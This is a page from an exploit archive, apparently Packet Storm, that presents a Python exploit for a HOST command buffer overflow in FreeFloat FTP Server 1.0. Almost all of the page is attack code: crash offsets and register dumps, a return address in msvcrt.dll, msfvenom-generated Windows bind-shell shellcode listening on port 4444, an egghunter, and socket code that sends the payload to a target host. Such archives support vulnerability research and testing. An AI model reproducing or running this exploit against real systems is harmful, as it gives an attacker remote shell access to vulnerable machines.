what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreeFloat FTP Server 1.0 HOST Buffer Overflow

FreeFloat FTP Server 1.0 HOST Buffer Overflow
Posted Nov 6, 2017
Authored by 1N3

FreeFloat FTP Server version 1.0 HOST buffer overflow exploit with ASLR bypass.

tags | exploit, overflow
SHA-256 | 87bd79a5a3aaf3db3a9c08a2705273f1b0d9a1babc34e142e265648150d6db47

FreeFloat FTP Server 1.0 HOST Buffer Overflow

Change Mirror Download
#!/usr/bin/python
# Exploit Title: FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
# Date: 11/05/2017
# Exploit Author: 1N3@CrowdShield - https://crowdshield
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows Vista SP2 Ultimate x86 (ASLR Enabled/DEP disabled)
# CVE : N/A

import socket, time

# CONNECT TO HOST
host = "10.0.0.39"
port = 21

# [*] Exact match at offset 246
#buffer = "HOST " + "\x41" * 246 + "\x42" * 4 + "\x43" * 745 + '\r\n'

# AFTER CRASH
#EAX 00000408
#ECX 001FC700
#EDX 77C45E74 ntdll.KiFastSystemCallRet
#EBX 0000001A
#ESP 01C7FC00 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EBP 016D13F0
#ESI 0040A29E FTPServer.0040A29E
#EDI 016D1D1F ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
#EIP 42424242

# !mona suggest
# 0BADF00D [+] Examining registers
# 0BADF00D EIP contains normal pattern : 0x41326941 (offset 246)
# 0BADF00D ESP (0x01d4fc00) points at offset 258 in normal pattern (length 742)
# 0BADF00D EDI (0x01741d24) points at offset 727 in normal pattern (length 273)

# CALL EDI - msvcrt.dll
#Found commands (All modules), item 5241
# Address=77D918F6
# Disassembly=CALL EDI
# Module Name=C:\Windows\system32\msvcrt.dll

# BIND SHELL
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python -b "\x0a\x00\x0d"
# Payload size: 355 bytes + 4 byte egg = 359 bytes
# Final size of python file: 1710 bytes
bind_shell = "T00WT00W"
bind_shell += "\xdd\xc2\xbf\x9a\xa8\x28\x21\xd9\x74\x24\xf4\x5d\x33"
bind_shell += "\xc9\xb1\x53\x31\x7d\x17\x83\xc5\x04\x03\xe7\xbb\xca"
bind_shell += "\xd4\xeb\x54\x88\x17\x13\xa5\xed\x9e\xf6\x94\x2d\xc4"
bind_shell += "\x73\x86\x9d\x8e\xd1\x2b\x55\xc2\xc1\xb8\x1b\xcb\xe6"
bind_shell += "\x09\x91\x2d\xc9\x8a\x8a\x0e\x48\x09\xd1\x42\xaa\x30"
bind_shell += "\x1a\x97\xab\x75\x47\x5a\xf9\x2e\x03\xc9\xed\x5b\x59"
bind_shell += "\xd2\x86\x10\x4f\x52\x7b\xe0\x6e\x73\x2a\x7a\x29\x53"
bind_shell += "\xcd\xaf\x41\xda\xd5\xac\x6c\x94\x6e\x06\x1a\x27\xa6"
bind_shell += "\x56\xe3\x84\x87\x56\x16\xd4\xc0\x51\xc9\xa3\x38\xa2"
bind_shell += "\x74\xb4\xff\xd8\xa2\x31\x1b\x7a\x20\xe1\xc7\x7a\xe5"
bind_shell += "\x74\x8c\x71\x42\xf2\xca\x95\x55\xd7\x61\xa1\xde\xd6"
bind_shell += "\xa5\x23\xa4\xfc\x61\x6f\x7e\x9c\x30\xd5\xd1\xa1\x22"
bind_shell += "\xb6\x8e\x07\x29\x5b\xda\x35\x70\x34\x2f\x74\x8a\xc4"
bind_shell += "\x27\x0f\xf9\xf6\xe8\xbb\x95\xba\x61\x62\x62\xbc\x5b"
bind_shell += "\xd2\xfc\x43\x64\x23\xd5\x87\x30\x73\x4d\x21\x39\x18"
bind_shell += "\x8d\xce\xec\xb5\x85\x69\x5f\xa8\x68\xc9\x0f\x6c\xc2"
bind_shell += "\xa2\x45\x63\x3d\xd2\x65\xa9\x56\x7b\x98\x52\x49\x20"
bind_shell += "\x15\xb4\x03\xc8\x73\x6e\xbb\x2a\xa0\xa7\x5c\x54\x82"
bind_shell += "\x9f\xca\x1d\xc4\x18\xf5\x9d\xc2\x0e\x61\x16\x01\x8b"
bind_shell += "\x90\x29\x0c\xbb\xc5\xbe\xda\x2a\xa4\x5f\xda\x66\x5e"
bind_shell += "\xc3\x49\xed\x9e\x8a\x71\xba\xc9\xdb\x44\xb3\x9f\xf1"
bind_shell += "\xff\x6d\xbd\x0b\x99\x56\x05\xd0\x5a\x58\x84\x95\xe7"
bind_shell += "\x7e\x96\x63\xe7\x3a\xc2\x3b\xbe\x94\xbc\xfd\x68\x57"
bind_shell += "\x16\x54\xc6\x31\xfe\x21\x24\x82\x78\x2e\x61\x74\x64"
bind_shell += "\x9f\xdc\xc1\x9b\x10\x89\xc5\xe4\x4c\x29\x29\x3f\xd5"
bind_shell += "\x59\x60\x1d\x7c\xf2\x2d\xf4\x3c\x9f\xcd\x23\x02\xa6"
bind_shell += "\x4d\xc1\xfb\x5d\x4d\xa0\xfe\x1a\xc9\x59\x73\x32\xbc"
bind_shell += "\x5d\x20\x33\x95"

# 32 BYTE EGGHUNTER
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# CALL EDI - msvcrt.dll
eip = "\xF6\x18\xD9\x77"

buffer = "HOST " + "\x41" * 246 + eip + "\x90" * 10 + bind_shell + "\x90" * 241 + egghunter + '\r\n'

try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
print sock.recv(1024)
sock.settimeout(10)

print "Sending buffer..."
print str(buffer)
sock.sendto(buffer, (host, port))
print "Sent!"

except:
print "socket connection failed!"

time.sleep(1)

print "Done!"
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close